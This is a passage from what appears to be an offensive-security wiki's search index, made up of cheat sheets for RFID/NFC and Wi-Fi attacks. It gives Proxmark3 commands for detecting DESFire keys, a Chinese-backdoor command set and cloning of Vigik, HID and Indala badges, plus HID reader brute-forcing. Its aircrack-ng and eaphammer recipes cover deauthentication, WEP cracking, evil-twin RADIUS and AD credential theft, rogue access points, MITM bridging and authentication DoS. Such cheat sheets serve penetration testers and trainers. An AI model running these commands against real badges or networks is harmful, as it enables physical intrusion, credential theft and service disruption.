mfdes write --aid 123456 --fid 01 -d 01020304 # autodetect file type (with hf mfdes getfilesettings) and write data with offset 0\nhf mfdes write --aid 123456 --fid 01 --type data -d 01020304 --commit # write backup data file and commit\nhf mfdes write --aid 123456 --fid 01 --type value -d 00000001 # increment value file\nhf mfdes write --aid 123456 --fid 01 --type value -d 00000001 --debit 
# decrement value file\nhf mfdes write --aid 123456 --fid 01 --type record -d 01020304 # write data to a record file\nhf mfdes write --aid 123456 --fid 01 --type record -d 01020304 --updaterec 0 # update record 0 (latest) in the record file.\n</code></pre> <p>Write via ISO command set</p> <pre><code>hf mfdes write --appisoid 1234 --fileisoid 1000 --type data -c iso -d 01020304 # write data to std/backup file via ISO command set\nhf mfdes write --appisoid 1234 --fileisoid 2000 --type record -c iso -d 01020304 # send record to record file via ISO command set\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#default-keys","title":"Default Keys","text":"<p>Changing the default keys is a crucial step in the deployment of MIFARE DESFire cards to prevent unauthorized cloning and access.</p> <ul> <li>Default AES key <pre><code>00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n</code></pre></li> <li>Default DES key <pre><code>00 00 00 00 00 00 00 00\n</code></pre></li> </ul> <p>Use a key to get the UID</p> <pre><code>hf mfdes getuid # authenticate with default key\nhf mfdes getuid -s d40 # via d40 secure channel\nhf mfdes getuid -s ev2 -t aes -k 11223344556677889900112233445566 # via ev2 secure channel with specified aes key\n</code></pre> <pre><code>hf mfdes detect # simply detect key for master application (PICC level)\nhf mfdes detect --save # detect key and save to defaults. 
afterwards check the output of hf mfdes default\nhf mfdes detect -s d40 # detect via channel d40\nhf mfdes detect --dict mfdes_default_keys # detect key with the help of a dictionary file\nhf mfdes detect --aid 123456 -n 2 # detect key 2 from application with AID 123456\n</code></pre> <pre><code>hf mfdes auth -n 0 -t des -k 1122334455667788 --aid 123456 # try application 123456 master key\nhf mfdes auth -n 0 -t aes --save # try PICC AES master key and save the configuration to defaults if authentication succeeds\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#uid-check","title":"UID check","text":"<p>The UID of the modifiable MIFARE DESFire\u00ae Compatible UID tags consists of two parts: the UID itself and the BCC. The BCC is a checksum value calculated from the UID. If the BCC is incorrect, the tag will be rejected by the reader.</p> <pre><code>hf 14a raw -s -c 02 00 ab 00 00 00 07 xx xx xx xx xx xx xx xx xx\n</code></pre> <p>For MIFARE DESFire cards, Flipper Zero is able to emulate only the UID.</p> <p>UID rewritable cards:</p> <ul> <li>LAB 401 - MODIFIABLE MIFARE DESFIRE\u00ae COMPATIBLE UID</li> <li>LAB 401 - MIFARE DESFIRE\u00ae COMPATIBLE MODIFIABLE UID / ATQA / SAK / ATS / APDU</li> </ul>"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#references","title":"References","text":"<ul> <li>Mifare DESFire EV3 \u2014 a beginner tutorial (Android Java) using the DESFire for Android tools - AndroidCrypto - Feb 18, 2024</li> <li>Mifare DESFire EVx NFC tag: Change the Master Application Key from DES to AES (Android/Java) - AndroidCrypto - Jun 19, 2024</li> <li>DESFireChangeMasterAppKey - AndroidCrypto - Jun 19, 2024</li> <li>Notes on MIFARE DESFire - iceman1001 - 2021</li> <li>Mifare DESFire - An Introduction - David Coelho - 19 May 2019</li> <li>AN-315 - Understanding MIFARE DESFire Credentials - ICT | Protege - 11-May-22</li> <li>MIFARE DESFire gallagher-research - megabug</li> </ul>"},{"location":"protocols/rfid-nfc/hf-mifare-ultralight/","title":"HF - Mifare 
UltraLight","text":"<ul> <li>Ultralight C (3DES authentication)</li> <li>Ultralight EV1</li> <li>NTAG2</li> </ul>"},{"location":"protocols/rfid-nfc/hf-mifare-ultralight/#chinese-backdoor","title":"Chinese backdoor","text":"<pre><code>pm3 --&gt; hf 14a raw -p -b 7 40\npm3 --&gt; hf 14a raw -p 43\npm3 --&gt; hf 14a raw -p -c a20059982120\n\n0x40, init backdoor mode\n0x41, wipe fills card with 0xFF\n0x42, fills card with 0x00\n0x43, no authentication needed. issue a 0x3000 to read block 0, or write block.\n0x44, fills card with 0x55\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-ultralight/#simulate","title":"Simulate","text":"<pre><code>hf 14a sim 2 &lt;7-byte tag&gt;\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-ultralight/#references","title":"References","text":""},{"location":"protocols/rfid-nfc/hf-vigik/","title":"HF - Vigik","text":"<p>Vigik is essentially a rebranded version of MIFARE Classic because it uses the same underlying technology and standards. </p> <ul> <li>cjbrigato/kigiv-for-proxmark3 - KIGIV stands for Reverse VIGIK, the French Residential and Postal/State services Residential Security system.</li> </ul> <pre><code>modprobe -r pn533_usb\nmodprobe -r pn533\n\nnfc-list # Check the proper functioning of the reader\nmfoc -P 500 -O blank-card.dmp # Extract the encryption keys from the Chinese RFID chip into a file\nmfoc -P 500 -O original-card.dmp # Copy the content of the original RFID chip into a file\nnfc-mfclassic W a original-card.dmp blank-card.dmp # Write the content of the original chip onto the Chinese chip\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-vigik/#residential-service-tokens","title":"Residential &amp; Service Tokens","text":"<p>Usually the key A is <code>0x314b49474956</code> (\"1KIGIV\")</p> <ul> <li>Residential token - can access one given building at any time</li> <li>Service token - (based on Mifare Classic + RSA signature of 768 or 1024 bits) can access all buildings during specific time 
slots</li> </ul> Provider Service Code Days Hours La Poste Service Universel 0x7aa Mo-Sa 6:00-0:00 La Poste Autre Services 0x7ab Any day 6:00-0:00 France Telecom 0x7ac Any day Any time EDF-GDF 0x7ad Any day Any time"},{"location":"protocols/rfid-nfc/hf-vigik/#public-keys","title":"Public Keys","text":"<pre><code>\"La Poste Service Universel\", 0x07AA, \"AB9953CBFCCD9375B6C028ADBAB7584BED15B9CA037FADED9765996F9EA1AB983F3041C90DA3A198804FF90D5D872A96A4988F91F2243B821E01C5021E3ED4E1BA83B7CFECAB0E766D8563164DE0B2412AE4E6EA63804DF5C19C7AA78DC14F608294D732D7C8C67A88C6F84C0F2E3FAFAE34084349E11AB5953AC68729D07715\"\n\"La Poste Service Universel\", 0x07AA, \"1577D02987C63A95B51AE149430834AEAF3F2E0F4CF8C6887AC6C8D732D79482604FC18DA77A9CC1F54D8063EAE6E42A41B2E04D1663856D760EABECCFB783BAE1D43E1E02C5011E823B24F2918F98A4962A875D0DF94F8098A1A30DC941303F98ABA19E6F996597EDAD7F03CAB915ED4B58B7BAAD28C0B67593CDFCCB5399AB\"\n\"La Poste Autres Services\", 0x07AB, \"A6D99B8D902893B04F3F8DE56CB6BF24338FEE897C1BCE6DFD4EBD05B7B1A07FD2EB564BB4F7D35DBFE0A42966C2C137AD156E3DAB62904592BCA20C0BC7B8B1E261EF82D53F52D203843566305A49A22062DECC38C2FE3864CAD08E79219487651E2F79F1C9392B48CAFE1BFFAFF4802AE451E7A283E55A4026AD1E82DF1A15\"\n\"La Poste Autres Services\", 0x07AB, \"151adf821ead26405ae583a2e751e42a80f4afff1bfeca482b39c9f1792f1e65879421798ed0ca6438fec238ccde6220a2495a3066358403d2523fd582ef61e2b1b8c70b0ca2bc92459062ab3d6e15ad37c1c26629a4e0bf5dd3f7b44b56ebd27fa0b1b705bd4efd6dce1b7c89ee8f3324bfb66ce58d3f4fb09328908d9bd9a6\"\n\"France Telecom\", 0x07AC, \"C44DBCD92F9DCF42F4902A87335DBB35D2FF530CDB09814CFA1F4B95A1BD018D099BC6AB69F667B4922AE1ED826E72951AA3E0EAAA7D49A695F04F8CDAAE2D18D10D25BD529CBB05ABF070DC7C041EC35C2BA7F58CC4C349983CC6E11A5CBE828FB8ECBC26F08E1094A6B44C8953C8E1BAFD214DF3E69F430A98CCC75C03669D\"\n\"France Telecom\", 0x07AC, 
\"9d66035cc7cc980a439fe6f34d21fdbae1c853894cb4a694108ef026bcecb88f82be5c1ae1c63c9849c3c48cf5a72b5cc31e047cdc70f0ab05bb9c52bd250dd1182daeda8c4ff095a6497daaeae0a31a95726e82ede12a92b467f669abc69b098d01bda1954b1ffa4c8109db0c53ffd235bb5d33872a90f442cf9d2fd9bc4dc4\"\n\"EDF-GDF\", 0x07AD, \"B35193DBD2F88A21CDCFFF4BF84F7FC036A991A363DCB3E802407A5E5879DC2127EECFC520779E79E911394882482C87D09A88B0711CBC2973B77FFDAE40EA0001F595072708C558B484AB89D02BCBCB971FF1B80371C0BE30CB13661078078BB68EBCCA524B9DD55EBF7D47D9355AFC95511350CC1103A5DEE847868848B235\"\n\"EDF-GDF\", 0x07AD, \"35b248888647e8dea50311cc50135195fc5a35d9477dbf5ed59d4b52cabc8eb68b0778106613cb30bec07103b8f11f97cbcb2bd089ab84b458c508270795f50100ea40aefd7fb77329bc1c71b0889ad0872c4882483911e9799e7720c5cfee2721dc79585e7a4002e8b3dc63a391a936c07f4ff84bffcfcd218af8d2db9351b3\"\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-vigik/#references","title":"References","text":""},{"location":"protocols/rfid-nfc/lf-hid-indala/","title":"LF - HID &amp; Indala","text":""},{"location":"protocols/rfid-nfc/lf-hid-indala/#hid-indala","title":"HID &amp; Indala","text":"<p>Cloning requires writable T55xx card. 
The T55x7 card can be configured to emulate many of the 125 kHz tags.</p> <pre><code>lf search # HID Prox TAG ID: 2004263f88\nlf hid fskdemod # (Push the button on the PM3 to stop scanning - not necessary)\nlf hid demod # (Push the button on the PM3 to stop scanning - not necessary)\nlf hid clone 2004263f88 # (ID to clone)\nlf hid sim 200671012d # simulate HID card with UID=200671012d\n\nlf indala read\nlf indala demod\nlf indala sim a0000000c2c436c1 # simulate Indala with UID=a0000000c2c436c1\nlf indala clone a0000000c2c436c1 # clone Indala to T55x7 card\n\nlf hitag info\nlf hitag sim c378181c_a8f7.ht2 # simulate HiTag\n</code></pre>"},{"location":"protocols/rfid-nfc/lf-hid-indala/#lf-em410x","title":"LF - EM410X","text":"<p>Read-only memory :/</p> <pre><code>Proxmark&gt; lf em4x em410xread\nEM410x Tag ID: 23004d4dee\nProxmark&gt; lf em4x em410xsim 23004d4dee\n</code></pre>"},{"location":"protocols/rfid-nfc/lf-hid-indala/#hid-examples-card","title":"HID : Examples - Card","text":""},{"location":"protocols/rfid-nfc/lf-hid-indala/#hid-card-format","title":"HID card format","text":"<pre><code>proxmark3&gt; lf hid decode 10001fc656\n-------------------------------------------------- \n Format: H10302 (HID H10302 37-bit huge ID) \n Card Number: 1041195 \n Parity: Valid \n-------------------------------------------------- \n Format: H10304 (HID H10304 37-bit) \nFacility Code: 1 \n Card Number: 516907 \n Parity: Valid \n-------------------------------------------------- \n</code></pre>"},{"location":"protocols/rfid-nfc/lf-hid-indala/#write-to-an-hid-card","title":"Write to an HID card","text":"<pre><code># the version with a facility code is better\nproxmark3&gt; lf hid encode H10304 f 49153 c 516907\nHID Prox TAG ID: 1c001fc656 \n\nproxmark3&gt; lf hid encode H10302 c 1041195\nHID Prox TAG ID: 10001fc656 \n-------------------------------------------------\n</code></pre> <p>Example 2</p> <pre><code>proxmark3&gt; lf hid decode 
1c0006bb43\n-------------------------------------------------- \n Format: H10302 (HID H10302 37-bit huge ID) \n Card Number: 220577 \n Parity: Valid \n-------------------------------------------------- \n Format: H10304 (HID H10304 37-bit) \nFacility Code: 49152 \n Card Number: 220577 \n Parity: Valid \n-------------------------------------------------- \nproxmark3&gt; lf hid encode H10302 c 220577\nHID Prox TAG ID: 100006bb43 \n</code></pre>"},{"location":"protocols/rfid-nfc/lf-hid-indala/#bruteforce-an-hid-reader","title":"Bruteforce an HID reader","text":"<pre><code>pm3 --&gt; lf hid brute a 26 f 224\npm3 --&gt; lf hid brute v a 26 f 21 c 200 d 2000\n\nOptions\n---\na &lt;format&gt; : 26|33|34|35|37|40|44|84\nf &lt;facility-code&gt; : 8-bit value HID facility code\nc &lt;cardnumber&gt; : (optional) cardnumber to start with, max 65535\nd &lt;delay&gt; : delay between attempts in ms. Default 1000ms\nv : verbose logging, show all tries\n</code></pre>"},{"location":"protocols/rfid-nfc/lf-hid-indala/#references","title":"References","text":"<ul> <li>Proxmark 3, le couteau suisse RFID - Bourdin Pierre - October 2017</li> <li>Badge Cloning: Clone HID Prox with Proxmark3 RDV4 - Standalone Mode - Tinker - October 22, 2018</li> </ul>"},{"location":"protocols/rfid-nfc/readme/","title":"NFC - RFID","text":"<p>Radio Frequency Identification (RFID) &amp; Near Field Communication (NFC)</p>"},{"location":"protocols/rfid-nfc/readme/#notes-about-card-types","title":"Notes about card types","text":""},{"location":"protocols/rfid-nfc/readme/#high-frequency","title":"High Frequency","text":"<p>Around 13.56 MHz.</p> <ul> <li>MIFARE Classic 1K/4K: basically just a memory storage device. This memory, either 1024 or 4096 bytes, is divided into sectors and blocks. Mostly used for regular access badges, with very simple security mechanisms for access control</li> <li>MIFARE Ultralight: a 64-byte version of MIFARE Classic. 
Its low cost makes it widely used for disposable tickets for events or transportation.</li> <li>MIFARE Plus: announced as a replacement for MIFARE Classic. The Plus subfamily raises the security level up to 128-bit AES encryption.</li> <li>MIFARE DESFire: those tags come pre-programmed with a general-purpose DESFire operating system which offers a simple directory structure and files, and are the type of MIFARE offering the highest security levels.</li> </ul>"},{"location":"protocols/rfid-nfc/readme/#low-frequency","title":"Low Frequency","text":"<p>Usually around 125 kHz.</p> <ul> <li>HID</li> <li>EM410X</li> <li>Indala</li> </ul>"},{"location":"protocols/rfid-nfc/readme/#replay-attacks","title":"Replay Attacks","text":"<p>A replay attack is a technique where a malicious user builds a device to intercept an NFC transaction and replays it later, using another device or even from a different location. </p>"},{"location":"protocols/rfid-nfc/readme/#relay-attack","title":"Relay Attack","text":"<p>The relay attack is a technique where a malicious user implements a man-in-the-middle attack. The attacker (APDUer) is capable of intercepting, manipulating and changing the transaction in real time to take advantage of it. 
https://en.wikipedia.org/wiki/Relay_attack</p> <ul> <li>NFC Payment Relay Attacks - intro-to-nfc-payment-relay-attacks/</li> <li>NFCopy85 is a 10-dollar device to make replay attacks against NFC payment systems - nfcopy85</li> </ul>"},{"location":"protocols/rfid-nfc/readme/#references","title":"References","text":"<ul> <li>RFID Hacking with The Proxmark 3 - Kevin Chung - May 29, 2017</li> <li>RFID \u2013 Le clone parfait - Alex - 12 July 2017</li> <li>Proxmark 3, le couteau suisse RFID - Bourdin Pierre - October 2017</li> <li>A 2018 practical guide to hacking NFC/RFID - S\u0142awomir Jasek - 4.06.2018</li> <li>Infosec - NFC Mifare - @SecurityGuill</li> </ul>"},{"location":"protocols/wifi/wifi-basics/","title":"Wifi - Basics","text":""},{"location":"protocols/wifi/wifi-basics/#tools","title":"Tools","text":"<ul> <li>aircrack-ng/aircrack-ng - WiFi security auditing tools suite</li> <li>kimocoder/wifite2 - Rewrite of the popular wireless network auditor, \"wifite\" - original by @derv82</li> <li>derv82/wifite2 - Rewrite of the popular wireless network auditor, \"wifite\" </li> <li>derv82/wifite - Wifite is an automated wireless attack tool.</li> </ul>"},{"location":"protocols/wifi/wifi-basics/#linux-wireless-basics","title":"Linux Wireless Basics","text":"<pre><code>AP_MAC=\"XX:XX:XX:XX:XX:XX\" # BSSID\nVICTIM_MAC=\"XX:XX:XX:XX:XX:XX\" # VIC\nATTACKER_MAC=\"XX:XX:XX:XX:XX:XX\" # MON\nAP_SSID=\"wifibox\" # ESSID\nSRC_ADDR=\"192.168.1.1\"\nDST_ADDR=\"192.168.1.255\"\n</code></pre> <pre><code># driver install\napt install realtek-rtl88xxau-dkms\n\n# network card recon\niwconfig\niw list\ndmesg | grep 8187 # alfa card\n\n# Increase Wi-Fi TX Power (set a permissive regulatory domain first)\niw reg set BO\niwconfig wlan0 txpower &lt;NmW|NdBm|off|auto&gt; # txpower is 30 (usually)\n\n# find SSID and channel\niw dev wlan0 scan | grep SSID\niw dev wlan0 scan | egrep \"DS\\ Parameter\\ set|SSID\"\niwlist wlan0 scanning | egrep \"ESSID|Channel\"\n\n# monitor mode - start\nairmon-ng start wlan0\nairmon-ng start wlan0 3 # only 
on a particular channel e.g: 3\n * Manual 1: iw dev wlan0 interface add mon0 type monitor\n * Manual 2: iwconfig wlan0 mode monitor channel 3\nifconfig mon0 up\n# monitor mode - stop\nairmon-ng stop mon0\n * Manual 1: iw dev mon0 del\n * Manual 2: iwconfig wlan0 mode managed\n</code></pre>"},{"location":"protocols/wifi/wifi-basics/#aircrack-ng-essentials","title":"Aircrack-ng Essentials","text":"<pre><code># check and kill processes that could interfere with our monitor mode\nairmon-ng check\nairmon-ng check kill\n# pkill dhclient; pkill wpa_supplicant; pkill dhclient3\n\n# list AP\nairodump-ng mon0\nairodump-ng mon0 -c 3 # only on a particular channel e.g: 3\nairodump-ng mon0 -c 3 --bssid $AP_MAC -w clearcap # dump traffic\n\n# get our MAC address\nmacchanger -s mon0 \nmacchanger --show mon0\n\n# replay and accelerate traffic\naireplay-ng\n * -i interface\n * -r file.pcap\n\n# check aireplay card compatibility\naireplay-ng -9 mon0 -&gt; test injection\naireplay-ng -9 -i wlan1 mon0 -&gt; test card to card injection\n\n# injection rate\niwconfig wlan0 rate 1M\n\n# Aircrack compatibility\nhttp://www.aircrack-ng.org/doku.php?id=compatibility_drivers#list_of_compatible_adapters\nAlfa AWUS036H / TPLink WN722\n</code></pre>"},{"location":"protocols/wifi/wifi-basics/#fake-authentication-attack","title":"Fake authentication attack","text":"<p>Use it before each attack.</p> <pre><code>airodump-ng -c 3 --bssid $AP_MAC -w wep1 mon0\n\n# fake authentication = no arp\naireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0\n * Might need a real $ATTACKER_MAC, observe traffic using airodump\n &gt; Association successful! 
:-)\n\n# fake authentication for picky AP\n# Send keep-alive packets every 10 seconds\naireplay-ng -1 6000 -o 1 -q 10 -e &lt;ESSID&gt; -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface&gt;\n\n# might need to fake your MAC ADDRESS first\n</code></pre>"},{"location":"protocols/wifi/wifi-basics/#deauthentication-attack","title":"Deauthentication attack","text":"<p>Forces an ARP packet to be sent.</p> <pre><code>aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n * -0 : 1 deauthentication, 0 unlimited\n &gt; Sending 64 directed DeAuth.\n</code></pre>"},{"location":"protocols/wifi/wifi-basics/#arp-replay-attack","title":"ARP Replay Attack","text":"<p>Video: wifu-20.mp4. The attack listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the AP to repeat the ARP packet with a new IV. By collecting enough of these IVs Aircrack-ng can then be used to crack the WEP key.</p> <pre><code>aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0\n * ATTACKER_MAC if fake authentication launched\n * CONNECTED_MAC if a client is associated\n\n# -x 1000 -n 1000 ?\n# aireplay-ng -3 -x 1000 -n 1000 -b $AP_MAC -h $ATTACKER_MAC wlan0mon\n# wait for ARP on the network\n# alternatively you can de-auth some clients\n\naircrack-ng -b &lt;BSSID&gt; &lt;PCAP_of_FileName&gt;\naircrack-ng -0 wep1.cap\n * -0 : colored output\n</code></pre>"},{"location":"protocols/wifi/wifi-basics/#references","title":"References","text":"<ul> <li>Wireless Penetration Testing Cheat Sheet [UPDATED \u2013 2022]</li> <li>Aireplay 0841 Attack \u2013 Introduction</li> </ul>"},{"location":"protocols/wifi/wifi-corporate/","title":"Wifi - Enterprise Network","text":""},{"location":"protocols/wifi/wifi-corporate/#wpa-and-wpa2-eap","title":"WPA and WPA2 EAP","text":"<p>WPA EAP refers to the use of the Extensible Authentication Protocol (EAP) within the context of the Wi-Fi Protected Access (WPA) security standard for wireless networks. 
WPA is a suite of security protocols to secure wireless local area networks (WLANs) and is a response to the vulnerabilities of the older Wired Equivalent Privacy (WEP) standard. WPA EAP is specifically associated with the enterprise mode of WPA, which uses 802.1X authentication to provide a higher level of security compared to the personal mode of WPA, which uses a pre-shared key (PSK).</p> <ul> <li> <p>s0lst1c3/eaphammer - Targeted evil twin attacks against WPA2-Enterprise networks. <pre><code>git clone https://github.com/s0lst1c3/eaphammer.git\n./kali-setup\n\n# generate certificates\n./eaphammer --cert-wizard\n\n# launch attack\n./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds\n\n# deauth users and wait for them to connect to our AP\naireplay-ng -0 0 -a MAC_ADDR_AP -c MAC_ADDR_CIBLE wlan0mon\n</code></pre></p> </li> <li> <p>Stealing RADIUS Credentials Using EAPHammer <pre><code>./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid Example --channel 2 --interface wlan0 --auth wpa-eap --creds\n</code></pre></p> </li> <li> <p>Stealing AD Credentials Using Hostile Portal Attacks <pre><code>./eaphammer --interface wlan0 --bssid 1C:7E:E5:97:79:B1 --essid EvilC0rp --channel 6 --auth wpa-eap --hostile-portal\n./eaphammer --interface wlan0 --essid TotallyLegit --hw-mode n --channel 36 --auth open --hostile-portal\n</code></pre></p> </li> <li> <p>Performing Captive Portal Attacks - Evil Twin Attacks <pre><code>./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid HappyMealz --channel 149 --interface wlan0 --captive-portal\n./eaphammer --captive-portal -e guestnet -i wlan0 --portal-template rogue-cert-prompt --lhost 10.0.0.10 --payload secure.crt\n</code></pre></p> </li> </ul>"},{"location":"protocols/wifi/wifi-corporate/#rogue-access-point","title":"Rogue Access Point","text":""},{"location":"protocols/wifi/wifi-corporate/#wpa-handshake","title":"WPA handshake","text":"<pre><code>airmon-ng start wlan0 3\nairodump-ng -c 3 -d $ATTACKER_MAC -w airbase mon0\n\n# 
basic fake AP\nairbase-ng -c 3 -e $AP_SSID mon0\nairbase-ng -c 3 -e $AP_SSID -z 4 -W 1 mon0\n-W 1 : WEP\n\n# get a WPA handshake if the client connects\naircrack-ng -w /pentest/passwords/john/password.lst airbase-01.cap\n</code></pre>"},{"location":"protocols/wifi/wifi-corporate/#karmetasploit","title":"Karmetasploit","text":"<pre><code># install a dhcp server\napt install dhcp3-server\n\nairmon-ng start wlan0 3\nairbase-ng -c 3 -P -C 60 -e $AP_SSID -v mon0\n-P: respond to all probes\nifconfig at0 up 10.0.0.1/24\n\nmkdir -p /var/run/dhcpd\nchown -R dhcpd:dhcpd /var/run/dhcpd\ntouch /var/lib/dhcp3/dhcpd.leases\n\n\"CONF DHCP FROM VIDEO 75\" &gt; /tmp/dhcpd.conf\n\ntouch /tmp/dhcp.log\nchown -R dhcpd:dhcpd /tmp/dhcp.log\ndhcpd3 -f -cf /tmp/dhcpd.conf -pf /var/run/dhcpd/pid -lf /tmp/dhcp.log at0\n\n# use karma.rc from metasploit\n# comment the first 2 lines (load sqlite)\nmsfconsole -r /root/karma.rc\n</code></pre>"},{"location":"protocols/wifi/wifi-corporate/#access-point-mitm","title":"Access Point MITM","text":"<pre><code>airmon-ng start wlan0 3\nairbase-ng -c 3 -e $AP_SSID_SPOOFED mon0\n\n# create a bridged interface\n# apt-get install bridge-utils\nbrctl addbr hacker\nbrctl addif hacker eth0\nbrctl addif hacker at0\n\n# assign IP addresses\nifconfig eth0 0.0.0.0 up\nifconfig at0 0.0.0.0 up\nifconfig hacker 192.168.1.8 up\n\n# enable IP forwarding\necho 1 &gt; /proc/sys/net/ipv4/ip_forward\n\n# mitm tools\ndriftnet\nettercap -G\nSniff &gt; Unified sniffing &gt; Hacker Interface\n</code></pre>"},{"location":"protocols/wifi/wifi-corporate/#references","title":"References","text":"<ul> <li>Retex : Test d\u2019intrusion Wi-Fi (WPA2-Enterprise) - @virtualsamuraii</li> </ul>"},{"location":"protocols/wifi/wifi-other/","title":"Wifi - Additional Tricks and Tools","text":""},{"location":"protocols/wifi/wifi-other/#additional-aircrack-ng-tools","title":"Additional Aircrack-NG Tools","text":""},{"location":"protocols/wifi/wifi-other/#remove-wireless-headers","title":"Remove Wireless 
Headers","text":"<pre><code>airdecap-ng -b $AP_MAC open-network.cap\n* -dec.cap: stripped version of the file\n</code></pre>"},{"location":"protocols/wifi/wifi-other/#decrypt-a-wep-encrypted-capture-file","title":"Decrypt a WEP encrypted capture file","text":"<pre><code>airdecap-ng -w $WEP_KEY wep.cap\n</code></pre>"},{"location":"protocols/wifi/wifi-other/#decrypt-a-wpa2-encrypted-capture-file","title":"Decrypt a WPA2 encrypted capture file","text":"<pre><code>airdecap-ng -e $AP_SSID -p $WPA_PASSWORD tkip.cap\n</code></pre>"},{"location":"protocols/wifi/wifi-other/#remote-aircrack-suite","title":"Remote Aircrack Suite","text":"<pre><code>airmon-ng start wlan0 3\nairserv-ng -p 1337 -c 3 -d mon0\nairodump-ng -c 3 --bssid $AP_MAC $HOST:$PORT\n</code></pre>"},{"location":"protocols/wifi/wifi-other/#wireless-intrusion-detection-system","title":"Wireless Intrusion Detection System","text":"<p>Requires the wireless key and BSSID.</p> <pre><code>airmon-ng start wlan0 3\n\n# create the at0 interface\nairtun-ng -a $AP_MAC -w $WEP_KEY mon0\n# the interface will auto decrypt packets\n</code></pre>"},{"location":"protocols/wifi/wifi-other/#wireless-reconnaissance","title":"Wireless Reconnaissance","text":"<p>Uses the CSV file from airodump.</p> <p>CAPR Graph</p> <pre><code>airgraph-ng -i wifu-01.csv -g CAPR -o wifu-capr.png\n# color\n- green: wpa\n- yellow: wep\n- red: open\n- black: unknown\n</code></pre> <p>CPG - Client Probe Graph</p> <pre><code>airgraph-ng -i wifu-01.csv -g CPG -o wifu-cpg.png\n</code></pre>"},{"location":"protocols/wifi/wifi-other/#kismet","title":"Kismet","text":"<pre><code>kismet\n[enter][enter]\n[tab][close]\n\n# Select a source and begin monitoring\nKismet &gt; Add source &gt; wlan0 &gt; Add\n\n.nettxt: data\n.pcapdump: wireshark format\n</code></pre> <pre><code># giskismet: kismet inside a SQL database\n&gt; requires a GPS receiver\n\ngpsd -n -N -D4 /dev/ttyUSB0\n-N : foreground \n-D : debugging level\n\n# kismet will gather SSID and GPS location\ngiskismet -x 
kismet.netxml\n\n# generate a kml file (Google Earth)\ngiskismet -q \"select * from wireless\" -o allaps.kml\ngiskismet -q \"select * from wireless where Encryption='WEP'\" -o wepaps.kml\n</code></pre>"},{"location":"protocols/wifi/wifi-other/#other-things","title":"Other things","text":"<pre><code># Find Hidden SSID\naireplay-ng -0 20 -a &lt;BSSID&gt; -c &lt;VictimMac&gt; mon0\n\n# Mac Filtering\nmacchanger --mac &lt;VictimMac&gt; wlan0mon\naireplay-ng -3 -b &lt;BSSID&gt; -h &lt;FakedMac&gt; wlan0mon\n# MAC CHANGER\nifconfig wlan0mon down\nmacchanger --mac &lt;macVictima&gt; wlan0mon\nifconfig wlan0mon up\n\n# Deauth Global\naireplay-ng -0 0 -e hacklab -c FF:FF:FF:FF:FF:FF wlan0mon\n\n# Authentication DoS Mode\nmdk3 wlan0mon a -a $AP_MAC\n\n# Tshark - Filter and display data\ntshark -r Captura-02.cap -Y \"eapol\" 2&gt;/dev/null\ntshark -i wlan0mon -Y \"wlan.fc.type_subtype==4\" 2&gt;/dev/null\ntshark -r Captura-02.cap -Y \"(wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol) &amp;&amp; wlan.addr==20:34:fb:b1:c5:53\" 2&gt;/dev/null\n\n# Convert .cap with handshake to .hccap\naircrack-ng -J network network.cap\n</code></pre>"},{"location":"protocols/wifi/wifi-wep/","title":"Wifi - WEP Cracking","text":""},{"location":"protocols/wifi/wifi-wep/#cracking-wep-with-a-client","title":"Cracking WEP with a Client","text":""},{"location":"protocols/wifi/wifi-wep/#arp-request-replay-attack","title":"ARP Request Replay Attack","text":"<p>Attack the ACCESS POINT</p> <pre><code>airmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng mon0 -c 3 --bssid $AP_MAC -w arpreplay # dump traffic\n\n# Fake authentication for a more reliable attack\naireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# ARP replay attack\naireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# Deauthentication\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# Cracking\naircrack-ng 
arpreplay.cap\n</code></pre>"},{"location":"protocols/wifi/wifi-wep/#interactive-replay-attack","title":"Interactive replay attack","text":"<p>Attack a client to force new packets. The 0841 attack, or interactive packet replay, is a WEP attack that allows for packet injection when ARP replay is not available or not working.</p> <pre><code>airmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w clearcap mon0 # dump traffic\n\n# fake authentication for a more reliable attack\naireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# interactive replay attack (min arp 68, max arp 86)\naireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # interactive - natural selection of a packet\naireplay-ng -2 -b $AP_MAC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0 # interactive - force create a packet\n# Packet selection (ARP packets meet these characteristics): \n# - APs will always repeat packets destined to the broadcast\n# - The packet will have the ToDS (To Distribution System) bit set to 1\n# answer \"y\" multiple times\n\n# cracking requires roughly 250000 IVs\naircrack-ng -0 -z -n 64 clientwep-01.cap\n * -z: PTW attack\n * -n: number of bits in the WEP key\n\n# backup file with an ARP packet\naireplay-ng -2 -r replay.cap mon0\n</code></pre>"},{"location":"protocols/wifi/wifi-wep/#cracking-wep-without-a-client","title":"Cracking WEP without a Client","text":"<ul> <li>Chopchop &amp; Fragmentation attack =&gt; PRGA, generate more packets with weak IVs</li> <li>Need an AP configured with open system authentication</li> </ul> <p>Prerequisite:</p> <pre><code># put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w wepcrack mon0 # see no 